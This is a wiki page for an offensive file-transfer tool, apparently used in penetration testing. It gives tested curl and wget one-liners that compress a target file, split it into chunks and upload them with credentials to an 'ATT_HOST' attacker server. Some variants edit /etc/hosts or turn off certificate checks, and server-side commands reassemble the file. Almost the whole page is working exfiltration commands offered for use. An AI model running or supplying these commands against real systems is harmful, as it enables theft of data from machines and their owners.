UL_ _Lin_ _Special_Cases - lighthouseitsecurity/barabbas GitHub Wiki
OVERVIEW:
- Overview:
- encountered not that often, across various distributions, by default
- popular/widely-used tool - often additionally installed
- for X.509 certificate validation to work, its
Common Namefield must contain one of the following:- a locally DNS-resolvable hostname/FQDN
- solved, by modifying the
hostsfile (requires local administrative privileges)
- solved, by modifying the
- the IP address of the listening network interface (that is being accessed)
- does not require local administrative privileges
- a locally DNS-resolvable hostname/FQDN
- works good/reliable
- decent speed (slower, compared to
wget)
- encountered not that often, across various distributions, by default
TESTED ON: Kali 2023.2
0. [CLIENT] confirm prerequisites
tools=("openssl" "grep" "tr" "cut" "sed" "tar" "split" "ls" "curl" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;
1. [SERVER] setup web server
sudo su
barabbas -i 192.168.5.11 -a 192.168.5.13 -up testuser:testpass -cn testhost
2. [CLIENT] open terminal session
(open terminal window with local administrative privileges)
3. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";
NOTE: copy target file to current directory
4. [CLIENT] upload file
echo '[*] STARTING FILE UPLOAD'; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; ATT_HOSTNAME=$(echo "$x509_info" | grep "Issuer:" | tr -d " " | cut -d "=" -f7); ATT_URL="https://$ATT_HOSTNAME:$ATT_PORT$ATT_PATH"; hosts_entry=$ATT_HOST' '$ATT_HOSTNAME; sed -i '$a\'"${hosts_entry}"'' /etc/hosts; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl --cacert /tmp/cert.crt -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; sed -i -z 's/'"${hosts_entry}\n"'//g' /etc/hosts; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";
5. [SERVER] assemble target file
export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;
TESTED ON: Kali 2023.2
0. [CLIENT] confirm prerequisites
tools=("openssl" "grep" "tar" "split" "ls" "curl" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;
1. [SERVER] setup web server
sudo su
barabbas -i 192.168.5.11 -a 192.168.5.13 -up testuser:testpass -cn 192.168.5.11
2. [CLIENT] open terminal session
(open terminal window)
3. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";
NOTE: copy target file to current directory
4. [CLIENT] upload file
echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl --cacert /tmp/cert.crt -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";
5. [SERVER] assemble target file
export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;
TESTED ON: Kali 2023.2
0. [CLIENT] confirm prerequisites
tools=("tar" "split" "ls" "curl" "grep" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;
1. [SERVER] setup web server
sudo su
barabbas -i 192.168.5.11 -a 192.168.5.13 -up testuser:testpass -cn testhost
2. [CLIENT] open terminal session
(open terminal window)
3. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";
NOTE: copy target file to current directory
4. [CLIENT] upload file
echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl -k -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1))"; echo; rm $compr_file_chunk; done; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";
5. [SERVER] assemble target file
export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;
- Overview:
- encountered very often, across various distributions, by default
- at the time of writing, does not support
POST-ing data usingmultipart/form-data- existing options for file upload (
--post-file,--body-file) use unsupported upload technique (application/x-www-form-urlencoded) - solved, by manually constructing the
POSTrequest body and adding required HTTP request headers
- existing options for file upload (
- for X.509 certificate validation to work, its
Common Namefield must contain a locally DNS-resolvable hostname/FQDN- solved, by modifying the
hostsfile (requires local administrative privileges)
- solved, by modifying the
- works good/reliable
- specifying credentials via readily available arguments resulted with occasional errors, as observed during testing
- workaround - manually add HTTP
Authorizationrequest header
- workaround - manually add HTTP
- specifying credentials via readily available arguments resulted with occasional errors, as observed during testing
- fast
TESTED ON: Kali 2023.2
0. [CLIENT] confirm prerequisites
tools=("openssl" "grep" "tr" "cut" "sed" "head" "tar" "split" "ls" "cat" "wget" "rm" "md5sum"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;
1. [SERVER] setup web server
sudo su
barabbas -i 192.168.5.11 -a 192.168.5.13 -up testuser:testpass -cn testhost
2. [CLIENT] open terminal session
(open terminal window with local administrative privileges)
3. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";
NOTE: copy target file to current directory
4. [CLIENT] upload file
echo '[*] STARTING FILE UPLOAD'; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; ATT_HOSTNAME=$(echo "$x509_info" | grep "Issuer:" | tr -d " " | cut -d "=" -f7); ATT_URL="https://$ATT_HOSTNAME:$ATT_PORT$ATT_PATH"; hosts_entry=$ATT_HOST' '$ATT_HOSTNAME; sed -i '$a\'"${hosts_entry}"'' /etc/hosts; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$compr_file_chunk'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $compr_file_chunk >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; wget -qO- --ca-certificate="/tmp/cert.crt" --header="Content-type: multipart/form-data boundary=$marker" --header="Authorization: Basic "$(echo -n $ATT_USER:$ATT_PASS | base64) --post-file /tmp/temp_file_wget $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; rm /tmp/temp_file_wget; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; sed -i -z 's/'"${hosts_entry}\n"'//g' /etc/hosts; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";
5. [SERVER] assemble target file
export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;
TESTED ON: Kali 2023.2
0. [CLIENT] confirm prerequisites
tools=("grep" "tr" "head" "tar" "split" "ls" "cat" "wget" "rm" "md5sum"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;
1. [SERVER] setup web server
sudo su
barabbas -i 192.168.5.11 -a 192.168.5.13 -up testuser:testpass -cn testhost
2. [CLIENT] open terminal session
(open terminal window)
3. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";
NOTE: copy target file to current directory
4. [CLIENT] upload file
echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$compr_file_chunk'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $compr_file_chunk >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; wget -qO- --no-check-certificate --header="Content-type: multipart/form-data boundary=$marker" --header="Authorization: Basic "$(echo -n $ATT_USER:$ATT_PASS | base64) --post-file /tmp/temp_file_wget $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; rm /tmp/temp_file_wget; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";
5. [SERVER] assemble target file
export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;